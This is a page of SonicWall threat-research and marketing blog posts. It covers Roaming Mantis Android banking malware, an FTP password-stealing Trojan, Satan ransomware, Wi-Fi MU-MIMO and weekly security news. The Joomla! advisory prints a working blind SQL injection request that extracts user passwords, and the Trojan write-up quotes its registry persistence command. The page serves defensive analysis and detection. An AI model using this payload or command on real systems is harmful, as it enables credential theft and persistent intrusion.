Roaming Mantis attacks Android devices in Asia, likely behind OTP codes (May 8, 2018)

/in /by

Sonicwall Capture Labs Threats Research Team observed another rampant Android threat that is targeted mainly towards Asian countries. This malware campaign – coined Roaming Mantis – began spreading via hijacked router DNS settings.

Hijacked DNS settings of a router belonging to a particular domain allows attackers to point the users visiting the legitimate domain to malicious websites, these websites can then push malicious payloads onto the visitor’s devices via pop-ups. The user typically trusts these pop-up’s as they appear to originate from a legitimate website. This technique was used to push malicious Android apps to victims and thereby spread further. We analyzed few such malicious apps belonging to the Roaming Mantis campaign in this blog.

Infection Cycle

Once the app is opened it opens a dex file named db in one of its folders – /assets:

Then it Base64 decodes the contents of this file and saves it locally as test.dex in one of the app folders named “a”:

Later it loads this file using DexClassLoader. Apart from the above activity, the original classes.dex file that is loaded as part of the app requests for device administrative privileges:

From the set of samples we analyzed, each sample contacted one of the two domains listed below:

  • my.tv.sohu.com
  • baidu.com

We saw limited network activity during our analysis thereby limiting the activity shown by the malware. Regardless there are a number of malicious components present in the code (specifically in the decoded test.dex) that showcase the capabilities of this threat:

Browser redirect

Once the test.dex file is decoded and loaded, the malware overlays the screen with an error message that is likely chosen from the code below:

Then the malware shows a spoofed Google authentication page on a webserver started on the device at a random port. This screen shows the users account (obtained as described below) and requests for name and date of birth.The malware accesses accounts present on the device and presents that on the spoofed page in an effort to make it look authentic:

The above image shows the malware access accounts present on the device – Google and Twitter in our case – and use it to its advantage.

Values verification code/OTP code

Close inspection of one of the error message in the above point shows how this app gives importance to verification codes. The complete error message is stored as parts, interesting ones are as below:

  • Account No.exists risks, use after certification
  • Find the new version, please use after updating
  • Would you like to grant this permission to ” + b + ‘?’, “After opening the permissions, \”” + b + “\” will be able to access the web page more quickly , and enhance the phone’s Internet experience
    구글 계정이 이상이 있습니다.음성검증을 들어 인증번호를 입력하여 구글 계정을 검증하도록합니다. 아니면 정상사용에 영향을 끼칠 것입니다. – Translation – I have an anomaly on my Google account. For voice verification, enter your verification number to verify your Google account. Or it will affect normal use
  • 인증번호 – Translation – Verification Number
  • 인증번호를 입력하세요 – Translation – Please enter your verification number

Monitor apps

The malware monitors presence of certain hardcoded apps on the device, these include:

  • Banking apps – com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking
  • MMORPG games – com.ncsoft.lineagem, com.nexon.axe, com.nexon.nxplay
  • OTP apps – kr.co.neople.neopleotp, com.atsolution.android.uotp2

As highlighted above this malware keeps an eye on OTP apps.

Dangerous permissions requested

This malware requests for a number of dangerous permissions during installation, few of them stand out as they can be correlated with stealing verification codes/OTP:

  • Send sms
  • Read sms
  • Receive mms
  • Receive sms
  • Record audio

Network communication

As mentioned in an earlier point, the malware has one hard-coded domain name (out of the two for this campaign). For each hard-coded domain it contains specific user accounts, for instance for baidu.com the following user accounts are present (separated by a “|”):

  • haoxingfu88
  • haoxingfu12389
  • wokaixin158998

The only network communication we saw during our analysis was GET requests from the malware to a specific user profile on baidu:

Hidden code

The malware contains an interesting piece of code as shown below:

Correlating this with the user accounts present in the code reveals the mystery of the code above. The malware extracts specific data from the web page using the code above as a search pattern :

The data present on the web page after the search pattern is – 傀傸傸偠傠傠傠偘傀傠偘傰傸傈僨傀僨僸傸傀

Upon correlating the characters one by one with a Unicode chart we obtained the following:

  • 80B8B860A0A0A05880A058B0B888E880E8F8B880

We did not see further network activity during our analysis, as a result we could not ascertain what happens once this code is extracted or the significance of this code.

Communication via SMTP

The malware contains code which indicates it can communicate with the attacker via smtp protocol. The below code shows how it can send an email with “new information” about the infected device:

Root check

The malware contains code where it check if the device is rooted. We did not see any specific actions that might be taken if the device is rooted/unrooted:

Targeted attack

A lot of things in the code point towards the fact that this malware might be targeted towards users in Asia, Korea in particular:

  • Korean language is present at a number of places in the code
  • A number of bankings apps targeted are from Asia – Woori Bank, Shinhan Bank
  • MMORPG games and OTP apps are Asian as well – AxE, Neople OTP
  • Both the domains my.tv.sohu and baidu are registered from Beijing and display content which is regional in nature

Hard-coded commands

The malware appears to contain a number of hard-coded commands:

Overall this malware campaign appears to be targeted towards Asian countries. Apart from its capability to harvest sensitive information from the infected device, it is particularly interested in OTP verification codes. The current set of samples target Banking and Gaming apps for their OTP codes but this can change to other types of apps as well.

Sonicwall Capture Labs provides protection against this threat with the following signatures:

  • AndroidOS.Banker.MNT
  • AndroidOS.Banker.DX

Following are apps that were targeted in the samples we analyzed:

  • com.wooribank.pib.smart
  • com.kbstar.kbbank
  • com.ibk.neobanking
  • com.sc.danb.scbankapp
  • com.shinhan.sbanking
  • com.hanabank.ebk.channel.android.hananbank
  • nh.smart
  • com.epost.psf.sdsi
  • com.kftc.kjbsmb
  • com.smg.spbs
  • com.webzen.muorigin.google
  • com.ncsoft.lineagem19
  • com.ncsoft.lineagem
  • kr.co.neople.neopleotp
  • kr.co.happymoney.android.happymoney
  • com.nexon.axe
  • com.nexon.nxplay
  • com.atsolution.android.uotp2

Following are MD5’s of few samples that we analyzed for this threat:

  • 03108e7f426416b0eaca9132f082d568
  • 1cc88a79424091121a83d58b6886ea7a
  • 2a1da7e17edaefc0468dbf25a0f60390
  • 31e61e52d38f19cf3958df2239fba1a7
  • 34efc3ebf51a6511c0d12cce7592db73
  • 4d9a7e425f8c8b02d598ef0a0a776a58
  • 808b186ddfa5e62ee882d5bdb94cc6e2
  • 904b4d615c05952bcf58f35acadee5c1
  • a21322b2416fce17a1877542d16929d5
  • 1bd7815bece1b54b7728b8dd16f1d3a9
  • 307d2780185ba2b8c5ad4c9256407504

What is MU-MIMO wireless technology?

/0 Comments/in /by

Did you know that wireless technology dates back to the 19th century? Through the years, great inventors like Michael Faraday, Thomas Edison and Nicola Tesla helped mold the concepts and theories behind electromagnetic radio frequency (RF).

It wasn’t until 1997, however, that the first 802.11 technology was introduced, which is known as the 802.11 legacy standard today. Since then, each new standard either introduced new technology or significantly improved over an older one.

The same holds true for 802.11ac technology. 802.11ac Wave 1 offered a significant enhancement over its predecessor, 802.11n. 802.11ac Wave 1 provided higher channel bandwidth and a new modulation scheme, significantly increasing the max data rates.

The Wave 2 wireless standard

Technology is always replaced and improved upon. Here, 802.11ac Wave 1 technology was replaced by today’s 802.11ac Wave 2 technology. With technologies like the Multi-User Multiple Input Multiple Output (MU-MIMO), increased channel width and more spatial streams (SS) than ever before to make Wave 2 technology a game-changer. Even though the theoretical maximum data rate as per the Wave 2 standard is 6.9 Gbps (8SS AP), the theoretical maximum with a 4SS access point (AP) is 3.5 Gbps.

Specs802.11n802.11ac Wave 1802.11ac Wave 2
Frequency band2.4 GHz and 5 GHz5 GHz5 GHz
MIMO supportSU-MIMOSU-MIMOMU-MIMO
Max channel width40 MHz80 MHz160 MHz
Max Spatial streams448
Modulation64-QAM256-QAM256-QAM
Beamformingimplicit and explicitexplicitexplicit
Backward compatibility11a/b/g11a/b/g/n11a/b/g/n
Max data rates600 Mbps1.7 Gbps6.9 Gbps

Compare the evolution of wireless capabilities from 802.11n to today’s Wave 2 standard.

What is MU-MIMO and how is it different from SU-MIMO?

MU-MIMO is a Wave 2 technology. With Single User Multiple Input Multiple Output (SU-MIMO), the AP is able to talk to only one client at a time. However, with MU-MIMO technology the AP can now transmit up to four devices at a time in the downstream direction.

Talking to more devices in a single transmission decreases airtime, increases efficiency and delivers a better user experience. For MU-MIMO to work, both the AP and the client must support the technology. Since the 11ac Wave 2 technology is backwards-compatible, if the Wave 2 AP has to transmit to a Wave 1 device it will fall back to the Wave 1 technology and use SU-MIMO to transmit.

MU-MIMO improves wireless speed, performance

Faster data transmission with MU-MIMO improves efficiency and ensures more airtime for all clients.  802.11ac Wave 2 enhancements lead to faster data rates, providing higher throughputs, better performance and user experience.

With a 4SS AP, operating on 160MHz channel, sending data to a 3SS client device, the maximum data rate that can be achieved is 2.6 Gbps. However, this is the maximum theoretical data rate. For reference, the latest Apple MacBook Pro is a 3SS 802.11ac Wave 1 device. The MacBook Air is a 2SS 802.11ac Wave 1 device and the Galaxy S3 is a 1SS 802.11ac Wave 1 device.

Overall, MU-MIMO increases network capacity and throughput. This allows the wireless network to meet the rising demand for data-hungry applications. Since the wireless access point can talk to multiple devices at the same time, the number of devices in the queue decreases, resulting in reduced wait time and latency. Increase in the overall network capacity and reduced latency benefits not just the Wave 1 and Wave 2 devices, but also the legacy clients. More than one client is needed to take advantage of MU-MIMO.

Specs1SS2SS3SS4SS
4SS, 80MHz43386713001733
4SS, 160MHz867173326003466

Wave 2 access point data rates in Mbps with different client types.

What happens during MU-MIMO transmission?

A MU-MIMO-capable AP sends a sounding signal to the client devices in the network. Each of the clients sends back a Channel State Information (CSI) based on the information it receives from the sounding signal. The AP calculates the phase and signal strength based on the CSI it receives from each client and selects the MU-MIMO-capable devices that can be grouped in one transmission.

Does MU-MIMO rely on any external factors?

Yes, MU-MIMO relies heavily on multipath and beamforming. Multipath is the process of two or more signals reaching the client at the same time or within nanoseconds of each other. Multipath happens due to RF barriers like walls, metal surfaces and concrete that cause the signals to reflect, refract, etc. Beamforming, however, directs the signal in the direction of the client.

Is it the right time to buy 802.11ac Wave 2 or should I wait for 802.11ax?

According to multiple analyst sources, the Wi-Fi market is not slowing down. For instance, IHS forecasts 11ac Wave 2 technology to increase 12 percent annually for the next three years. There are a number of Wave 2-capable devices in the market today and this will increase in the near future.

Should you wait for 802.11ax? The answer is simple: no. You are looking at a couple of years for the full-fledged adoption of 11ax products. The standard in itself is expected to be ratified in late 2019 after which it needs to pass interoperability testing by Wi-Fi Alliance.

Once manufacturers release 11ax-capable APs that are certified by the Wi-Fi Alliance, mainstream adoption will occur, which is expected to be around 2020. At the same time, 11ax-capable client devices are required to reap the full benefits of the 11ax network. For the next couple of years, 11ac Wave 2 technology will remain the next-gen wireless connectivity standard.

Where can I buy Wave 2 wireless access points?

SonicWall SonicWave Wave 2 access points (432i/432e/432o 802.11ac) provide all the benefits of Wave 2 technology. You can expect superior performance and reliability with these access points. MU-MIMO technology enables SonicWave 400 series access points to transmit up to four devices at the same time.

To implement best practices in wireless networking and wireless security, download our complimentary technical brief, “SonicWall Wireless Network Security.” Learn how SonicWall wireless network security solutions can alleviate performance and security concerns, enabling you to extend your business network without jeopardizing its integrity.

Password stealer sends data to a remote FTP server

/in /by

The SonicWall Capture Labs Threat Research Team has observed a Trojan dropping an FTP client. This is specially crafted to connect to a hardcoded remote FTP server to send stolen stored password information from a victim’s machine. It also drops a multitude of scripts which are executed in succession to perform the infection.

Infection Cycle:

The Trojan purports to be a PDF file using the following icon:

Figure 1: Icon used by the Trojan

Upon execution this Trojan opens an empty jpg file using a photo editor which then throws an error as shown in the figure below:

Figure 2: Microsoft Photo editor error when opening an empty image file

It creates a subdirectory named”AadobeRead” within the  “Adobe”  folder in the %APPDATA% directory. It then drops the following files:

  • %APPDATA%\Adobe\Adobe Inc\AdobeRead\adbr01.exe  [detected as GAV: Stealer.PASS (Trojan)]
  • %APPDATA%\Adobe\Adobe Inc\AdobeRead\adbr02.exe [detected as GAV: Stealer.PASS (Trojan)]
  • %APPDATA%\Adobe\Adobe Inc\AdobeRead\870.afr (ftp commands and credentials)
  • %APPDATA%\Adobe\Adobe Inc\AdobeRead\sun.afr (ftp commands and credentials)
  • %APPDATA%\Adobe\Adobe Inc\AdobeRead\abb1.bat [detected as GAV: Adob.BAT (Trojan)]
  • %APPDATA%\Adobe\Adobe Inc\AdobeRead\hvv02.bat [detected as GAV: Adob.BAT_4 (Trojan)]
  • %APPDATA%\Adobe\Adobe Inc\AdobeRead\hvv03.bat [detected as GAV: Adob.BAT_3 (Trojan)]
  • %APPDATA%\Adobe\Adobe Inc\AdobeRead\Adob9.vbs [detected as GAV: Adob.VBS_4 (Trojan)]
  • %APPDATA%\Adobe\Adobe Inc\AdobeRead\istart.vbs  [detected as GAV: Adob.VBS_4 (Trojan)]
  • %APPDATA%\Adobe\Adobe Inc\AdobeRead\BReader.exe (a non-malicious sleep module)
  • %APPDATA%\Adobe\Adobe Inc\AdobeRead\245.jpg  (this is the empty JPG file)
  • %APPDATA%\Adobe\Adobe Inc\AdobeRead\Adobeta.exe [detected as GAV: Fake.FTP (Trojan)]

The vbscript named istart.vbs is what starts the entire process. It runs the batch file named “hvv02.bat” which copies the files into the %APPDATA% directory as outlined above.

Figure 3: istart.vbs file stealthily runs hvv02.bat

Figure 4: hvv02.bat creates a copy of the rest of its malicious components

Hvv02.bat then runs another vbscript named “Adob9.vbs” which in turn runs hvv03.bat. This last batch file is responsible for running the rest of the executable files used to steal all stored password information and save them into a file. Its own FTP client named “Adobeta.exe” is used to connect to a remote server to send out all the information gathered.

Figure 5: Adob9.vbs which runs another batch file

Figure 6: hvv03.bat has all the commands to save and send all stolen data.

To ensure persistence within the system this Trojan adds a run key in the registry which runs a batch file to start the entire process all over.

  • “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /V “32455cent” /t REG_SZ /F /D “%appdata%\Adobe\Adobe Inc\AdobeRead\abb1.bat”

Figure 7: abb1.bat runs Adob9.vbs

The files 870.afr and sun.afr contain the commands and credentials used to connect to the remote FTP server.

Figure 8: 870.afr and sun.afr

Below are the connections made to a remote server:

Figure 9: First connection made

Figure 10: Second connection made using different credentials

The report files “Email Password Recovery Report” and ” Browser Password Recovery Report” along with the victim machine’s IP Configuration are saved within the same APPDATA directory following the naming convention as set by the hvv03.bat file.

Figure 11: Sample Password recovery report

SonicWALL Capture Labs provide protection against this threat with the following signature:

  • GAV: Stealer.PASS (Trojan)
  • GAV: Adob.BAT (Trojan)
  • GAV: Adob.BAT_3 (Trojan)
  • GAV: Adob.BAT_4 (Trojan)
  • GAV: Fake.FTP (Trojan)

Joomla! User Notes SQL Injection

/in /by

Joomla! is a free and open source content management system (CMS) used for building websites and for publishing web content. It is estimated to be the second most used content management system on the Internet after WordPress.

An SQL injection vulnerability exists in the Joomla! com_users component due to insufficient input validation of the filter “category_id”. This component can be invoked by accessing the following URI.
 
/administrator/index.php?option=com_users&view=notes
 
The method getListQuery() in the com_users component gets called to create an SQL SELECT query to list all the user notes for the value passed in the HTTP request. One such key is category_id and the value of category_id gets used in the SQL query without proper validation. So a malicious user can craft a HTTP request with a value of category_id that modifies the constructed SQL query to perform operations that the programmer did not originally intend. Successful exploit can lead to sensitive information disclosure, tamper with existing data or execute administration operations on the database.
 
 
 
An example of the crafted HTTP request to the vulnerable server  is given below:
 
POST /joomla/administrator/index.php?option=com_users&view=notes HTTP/1.1\r\n
Text data: filter%5Bcategory_id%5D=7+AND+ascii(substring((SELECT+concat(1,password,0x2F)+ from+#__users+limit+0,1), 2,1))>31&
 
This can be mitigated by upgrading to the latest non-vulnerable version of the software.
 
SonicWALL Threat Research Team have the following signatures to protect their customers.
IPS 13316: Joomla! User Notes SQL Injection
WAF 1001: Blind SQL Injection Attack Variant 5
WAF 9002: Blind SQL Injection Attack Variant 1
WAF 9004: Blind SQL Injection Attack Variant 3
WAF 9006: SQL Injection Attack 2
WAF 9045: SQL Injection Attack 11

Cyber Security News & Trends – 05-04-18

/0 Comments/in /by

Each week, SonicWall collects the cyber security industry’s most compelling, trending and important interviews, media and news stories — just for you.

SonicWall Spotlight

FBI Calls Attention to ‘BEC’ Scams  CRN

  • In an article detailing the rise of BEC scams by the FBI, SonicWall President and CEO Bill Conner is quoted for his insight on the issue noting that technology such as DPI SSL can help as a preventative to potential breaches.

A Bitcoin Podcaster Brilliantly Trolled His Own Hacker  The Verge

  • A podcaster’s web domain was hacked and held for ransom via remote hackers. Ransomware data from SonicWall’s 2018 Cyber Threat Report was cited.

Bringing Visibility to the Midmarket  Data Breach Today

  • In a video interview with ISMG’s Data Breach Today, SonicWall’s Bill Conner shares his vision to ensure smaller and mid-sized businesses have a clear view of the threat landscape taking aim at their companies. In the video he expands on the SME visibility challenge, SonicWall’s solutions to improve alerts and analytics and how SonicWall is addressing customer cloud security concerns.

Jonesboro Council Tackles Cybersafety  The Clayton News Daily

  • Due to the recent Atlanta data breach, other cities are taking the initiative to bolster their preventative cybersecurity measures such as Georgia’s Jonesboro City Council who recommend SonicWall’s TZ300 Firewall solution to protect the city’s financial data.

Cyber Security News

North Korea’s Antivirus Software Whitelisted Mystery Malware The Register

  • North Korea’s very own antivirus software has been revealed to be based on a 10-year-old application made by Trend Micro, but with added nasties.

Commonwealth Bank Lost Data on Nearly 20M Customers  ZDNet

  • The Commonwealth Bank of Australia (CBA) is unsure of where data on millions of customers has gone, after it was revealed that magnetic tapes comprising information used to print account statements may not have been properly disposed of.

Breaches Drive Consumer Stress Over Cybersecurity  Dark Reading

  • As major data breaches make headlines, consumers are increasingly worried about cyberattacks, password management, and data security.

This Password-Stealing Malware Uses Facebook Messenger to Spread Further  ZDNet

  • A form of malware which uses fake Facebook Messenger messages to spread has suddenly surged back into life and has developed new tricks to steal passwords, steal cryptocurrency and engage in cryptojacking.

House Appropriations Panel Should Step Up Cyber Oversight, Member Urges  Nextgov

  • Dutch Ruppersberger, D-Md., sent out a report Monday outlining key areas the panel should focus on, including the threat of adversary nations stealing U.S. government hacking tools, cyber threats against industrial control systems that manage chemical and gas plants and ways to surge information sharing about cyber threats within industry sectors.

In Case You Missed It

Upcoming Webinars & Events

May 8
Webinar
11 a.m. PDT
Under the Hood: How to Responsibly Decrypt & Inspect Encrypted Traffic
> Register Now

IoT & Mobile Threats: What Does 2017 Tell Us About 2018?

/0 Comments/in /by

“SPARTANS! Ready your breakfast and eat hearty. For tonight, WE DINE IN HELL!!”

Remember this passionate line by King Leonidas from the movie “300”? We are at the brink of another war — the modern cyber arms race. You need to gear up and be prepared for the thousands of malicious “arrows” that shoot down on you.

This cyber arms race is aimed against governments, businesses and individuals alike, and it’s comprised of different types and forms of cyber attacks. These attacks grow more sophisticated each year, with over 12,500 new Common Vulnerabilities and Exposures (CVE) reported in 2017 — 78 percent of which were related to network attacks.

It’s critical we learn from the past experiences — successes and failures. So, what can 2017 teach us to be better prepared in 2018? Let’s first look at the hard data.

According to the 2018 SonicWall Cyber Threat Report, SonicWall Capture Labs detected 184 million ransomware attacks and a 101.2 percent increase in new ransomware variants from more than 1 million sensors across more than 200 countries. The increase in new variations signifies a shift in attack strategies.

In addition, SonicWall Capture Labs logged 9.32 billion malware attacks. Network attacks using encryption tactics are also on the rise. Without the ability to inspect such traffic, an average organization would have missed over 900 file-based attacks per year hidden by SSL/TLS encryption.

IoT attacks loom

Internet of Things (IoT) threats and memory attacks are also impending challenges that we face across wired and wireless solutions. According to Gartner, by 2020, IoT technology will be in 95 percent of electronics for new product designs.

Recently, Spiceworks performed a survey that resulted in IoT devices being the most vulnerable to Wi-Fi attacks. This makes IoT and chip processors the emerging battlegrounds. IoT was also a big target as “smart” (pun intended) hardware is not updated regularly and is often physically located in unknown or hard-to-reach places, leading to memory attacks and vulnerabilities.

IoT ransomware attacks are alone on the rise and gain control of a device’s functionality. While many of the IoT devices may not hold any valuable data, there is a risk for owners or individuals to be held at ransom for personal data. Gartner also predicts, through 2022, half of all security budgets for IoT will go to fault remediation, recalls and safety failures rather than protection.

There are many smart devices and IoT devices in the market that connect over Wi-Fi, such as cameras, personal and TVs. Imagine an attack on your personal privacy and a hacker gaining control over your device. Distributed Denial of Service (DDoS) attacks still remain a major threat to these devices. Each compromised device can send up to 30 million packets per second to the target, creating an IoT powered botnet.

In fact, at one point in 2017, SonicWall Capture Labs was recording more than 62,000 IoT Reaper hits each day. Considering there could be an estimated 6 billion mobile devices in circulation by 2020, it wouldn’t be totally surprising if the next wave of ransomware targets mobile devices,

How to secure wired, wireless and mobile networks

It is critical to secure your network, both from a wireless and wired perspective. Total end-to-end security is the key to prevent such attacks from happening in the first place. To survive this cyber war, you can follow certain best practices to ensure your protection:

  • Layer security across your wired, wireless, mobile and cloud network
  • Deploy next-gen firewalls that can provide real-time intrusion detection and mitigation
  • Patch your firewalls and endpoint devices to the latest firmware
  • Secure your IoT devices to prevent device tampering and unauthorized access
  • Educate your employees on the best practices
  • Change default login and passwords across your devices

SonicWall solutions include next-generation firewalls, 802.11ac Wave 2 access points, secure mobile access appliances and the Capture Advanced Threat Protection (ATP) cloud sandbox service, all of which combine to provide an effective zero-day threat protection ecosystem.

To protect customers against the increasing dangers of zero-day threats, SonicWall’s cloud-based Capture ATP service detects and blocks advanced threats at the gateway until a verdict is returned. In addition, Capture ATP also monitors memory-based exploits via Real-Time Deep Memory InspectionTM (RTDMI). With innovative SonicWall solutions, rest assured your IoT and mobile devices are protected for the cyberwar.

Download the 2018 SonicWall Cyber Threat Report

The cyber arms race is a challenge we face together. And it’s the core reason we’re committed to passing our findings, intelligence, analysis and research to the global public via the SonicWall 2018 Cyber Threat Report.

READ THE FULL REPORT

Cyber Security News & Trends – 04-27-18

/0 Comments/in /by

Each week, SonicWall collects the cyber security industry’s most compelling, trending and important interviews, media and news stories — just for you.

SonicWall Spotlight

Bringing Visibility to the Midmarket  Data Breach Today

  • In a video interview with ISMG’s Data Breach Today, SonicWall’s Bill Conner shares his vision to ensure smaller and mid-sized businesses have a clear view of the threat landscape taking aim at their companies. In the video he expands on the SME visibility challenge, SonicWall’s solutions to improve alerts and analytics and how SonicWall is addressing customer cloud security concerns.

Jonesboro Council Tackles Cybersafety  The Clayton News Daily

  • Due to the recent Atlanta data breach, other cities are taking the initiative to bolster their preventative cybersecurity measures such as Georgia’s Jonesboro City Council who recommend SonicWall’s TZ300 Firewall solution to protect the city’s financial data.

SonicAlert: New Variant Family of PUBG Ransomware  SonicWall Security Center

  • The SonicWall Capture Labs Threat Research Team has observed reports of a new variant family of PUBG Ransomware [Pubg.RSM] actively spreading in the wild. PUBG Ransomware encrypts the victim’s files and forces them to play an hour of a game called PlayerUnknown’s Battlegrounds to get their files back.

Cyber Security News

Almost Half UK Businesses Suffered Cyberattack or Security Breach Last Year, Figures Show  The Independent

  • Nearly half the businesses in the UK have fallen victim to cyberattacks or security breaches in the last year, costing them each thousands of pounds, new data shows.

Global Police Just Shut Down World’s Largest Marketplace That Allegedly Disrupted Millions of Sites  The Washington Post

  • An international police operation recently shut down the world’s largest for-hire service that allegedly slowed and disrupted millions of websites using malicious cyber tools, officials said Wednesday.

Traffic Hijack: Users Sent to Phishing Site in Two-Hour Cryptocurrency Heist  ZDNet

  • Attackers on Tuesday pulled off a complex attack using kinks in core internet infrastructure that caused users of an Ethereum wallet developer’s website to be redirected to a phishing site.

Huawei Under Criminal Investigation Over Iran Sanctions  The Wall Street Journal

  • The Justice Department is investigating whether Huawei Technologies Co. violated U.S. sanctions related to Iran, according to people familiar with the matter, opening a new avenue of scrutiny amid wider national-security concerns over the Chinese cellular-electronics giant.

This Ransomware was Rewritten to Mine Cryptocurrency – and Destroy Your Files  ZDNet

  • Some criminals are shifting from ransomware to cryptocurrency miners — those behind XiaoBa have rejigged the code to shift the same malware towards a different focus.

In Case You Missed It

SonicWall CEO: ‘It’s Time to Arm Up’ Against Malware, Encrypted Attacks

/0 Comments/in /by

You can’t fight what you can’t see.

Cliché as it may sound, cybercriminals are using organizations’ lack of network visibility as a cornerstone for their attack strategies. Savvy threat actors are encrypting their malware payloads to cloak attacks and defeat standard security controls.

At RSA Conference 2018 in San Francisco, SonicWall president and CEO Bill Conner spoke with TechRepublic about the rapidly changing cyber arms race and the need to properly detect and inspect encrypted traffic, which made up 68 percent of all web traffic in 2017 — a 24 percent year-over-year increase from 2016.

“In Q1, you see a dramatic increase in malware and ransomware. We’re also seeing a dramatic increase in SSL encryption, and encryption being used to carry malware,” Conner told TechRepublic.

As Conner discussed, the 2018 Cyber Threat Report illustrated these challenges. But the threat landscape changes rapidly. In the first quarter of 2018 alone, the average SonicWall customer faced:

  • 7,739 malware attacks (151 percent increase over Q1 2017)
  • 173 ransomware attacks (226 percent increase over Q1 2017)
  • 335 encrypted threats (403 percent increase over Q1 2017)

By investing in updated solutions, and enabling SSL/TLS inspection capabilities, organizations can have the best of both security and performance. Many next-generation firewalls — like the SonicWall NSa series, for example — include DPI-SSL capabilities. However, these critical controls aren’t always activated or implemented properly, so it’s important to confer with your cyber security vendor or managed security services provider (MSSP) that you have the ability to decrypt and inspect SSL and TLS traffic.

Guidance on stopping encrypted cyber attacks

Encrypted threats will defeat even the most robust firewall if it’s not properly using deep packet inspection of SSL and TLS, often known as DPI-SSL.

If you choose not to inspect encrypted traffic — or if your firewall is limited in its ability to do so — you are truly missing a critical value of your firewall.

It is possible for organizations to enjoy the security benefits of SSL/TLS encryption without providing a hidden tunnel for attackers.

For practical guidance on implementing SSL and TLS decryption and inspection abilities, review “Encrypted Cyber Attacks: Real Data Unveils Hidden Danger within SSL, TLS Traffic” or watch the on-demand webcast, “Technical Deep Dive on how to Defeat Encrypted Threats with SonicWall DPI-SSL Technology.”

Ransomware, Variants, Snipers & Kung Fu

/0 Comments/in /by

The 2018 SonicWall Cyber Threat Report reported a 71.2 percent decline in the number of ransomware attacks, but a 101.2 percent increase the number of ransomware variants. Let me ask you, is this good news or bad?

If this was a military battle, would you celebrate the news the enemy reduced the number of machine guns by nearly three quarters but doubled the number of snipers? Perhaps, but now you’d have to keep your head lower and stay out of sight.

2016 saw a flood of “spray-and-pray” ransomware attacks as hackers were taking advantage of soft defenses and low levels of employee awareness. In fact, in 2016 SonicWall blocked nearly 640 million ransomware attacks; that was over 1,200 ransoms not seen (or paid) each minute.

Because of this intense pressure, organizations around the globe bolstered their defenses and education efforts. Simply put, we got tired of getting beat up for our lunch money and took Kung-Fu lessons.

Attackers retool ransomware strategies

In 2017, attackers retooled with new exploits. From that, WannaCry, NotPetya and Bad Rabbit were born. Each were designed to be malware cocktails that infected a system and then move on to the rest of the network through shared drives. But these are just three of the 2,855 variants SonicWall created defenses for in 2017 alone.

With these new malware cocktails in the wild, threat actors targeted specific roles within companies through social engineering. Instead of annoying thousands of people with a small ransom with a shrinking chance they will pay, many switched to hard-hitting attacks with larger demands.

Unique Ransomware Signatures

One such instance was the city of Atlanta, where the SamSam ransomware variant affected five out of 13 city departments and shut down systems for 10 days. Fortunately, the $51,000 ransom went unpaid but the damages to systems, lost files and productivity far outweigh the demand.

How to stop ransomware attacks, avoid ransom payouts

So, what can we do in this period of the threat landscape? Employee awareness for social engineering attacks (e.g., phishing attempts) still needs to drastically improve. Strong password hygiene also needs to be in place to block attacks like SamSam that work off of guessed passwords.

From there, we need ransomware protection technology in place that stops attacks. Here are two core technologies have may not have thought of recently:

  1. Implement a network sandbox that can identify and stop unknown attacks.

    A network sandbox is an isolated environment on the firewall that runs files to monitor their behavior. SonicWall Capture Advanced Threat Protection (ATP) is a multi-engine sandbox service that holds suspicious files at the gateway until a verdict can be achieved.

    Capture ATP also features Real-Time Deep Memory InspectionTM (RTDMI). RTDMI is a memory-based malware analysis engine that catches more malware, and faster, than behavior-based sandboxing methods. It also delivers a lower false-positive rate to improve security and the end-user experience. Learn about its ability to find and block malicious PDFs and Office documents.

  2. Use advanced endpoint client security

    For years, companies deployed traditional anti-virus (AV) on their computers, which was fine when the total number of signatures they had to write and update numbered in the hundreds of thousands. Last year, SonicWall discovered 58 million new forms of malware that take time to signature and push to defense points like firewalls.

    Even if these are pushed within 24 hours, it leaves a gap that new and advanced malware can walk right through. I recommend using a next-generation anti-virus (NGAV) solution that can monitor the behavior of a system to look for malicious activities, such as the unauthorized encryption of your files. For example, SonicWall Capture Client delivers advanced malware protection and additional security synergies for SonicWall firewall users.

On top of these two new forms of technology, please follow best practices when securing and managing your networks, such as network segmentation.

Download the 2018 SonicWall Cyber Threat Report

The cyber arms race is a challenge we face together. And it’s the core reason we’re committed to passing our findings, intelligence, analysis and research to the global public via the SonicWall 2018 Cyber Threat Report.

READ THE FULL REPORT

Satan Ransomware employs EternalBlue Exploit Kit

/in /by

Description

The SonicWall Capture Labs Threat Research Team have received reports of a new variant of the Satan ransomware. The Satan ransomware has been around since early 2017 but it was not until late 2017 that we have seen it adopt the use of the EternalBlue exploit kit. This is the same exploit kit that was and still is being used by ransomware such as WannaCry and BadRabbit and is being employed to penetrate more effectively through internal networks.

Infection Cycle:

Upon infection the trojan encrypts files on the system and prepends [satan_pro@mail.ru] to the original filename. After infection it displays the following text:

The Trojan drops the following files to the filesystem:

  • %ALLUSERSPROFILE%\client.exe [Detected as GAV: Suspicious#mpress.2 (Trojan)]
  • %ALLUSERSPROFILE%\blue.exe [Detected as GAV: Squida.A_2 (Trojan)]
  • %ALLUSERSPROFILE%\blue.fb
  • %ALLUSERSPROFILE%\blue.xml
  • %ALLUSERSPROFILE%\cnli-1.dll [Detected as GAV: MalAgent.J_39290 (Trojan)]
  • %ALLUSERSPROFILE%\coli-0.dll [Detected as GAV: Downloader.A_1172 (Trojan)]
  • %ALLUSERSPROFILE%\crli-0.dll [Detected as GAV: MalAgent.J_29735 (Trojan)]
  • %ALLUSERSPROFILE%\dmgd-4.dll [Detected as GAV: Artemis.A_162 (Trojan)]
  • %ALLUSERSPROFILE%\down64.dll
  • %ALLUSERSPROFILE%\exma-1.dll [Detected as GAV: Shadowbrokers.D_5 (Trojan)]
  • %ALLUSERSPROFILE%\libeay32.dll
  • %ALLUSERSPROFILE%\libxml2.dll
  • %ALLUSERSPROFILE%\ms.exe [Detected as GAV: SatanCryptor.RSM_2 (Trojan)]
  • %ALLUSERSPROFILE%\posh-0.dll [Detected as GAV: MalAgent.J_21737 (Trojan)]
  • %ALLUSERSPROFILE%\ssleay32.dll [Detected as GAV: Eqtonex.A_6 (Trojan)]
  • %ALLUSERSPROFILE%\star.exe [Detected as GAV: MalAgent.J_8604 (Trojan)]
  • %ALLUSERSPROFILE%\tibe-2.dll [Detected as GAV: MalAgent.H_9335 (Trojan)]
  • %ALLUSERSPROFILE%\star.xml
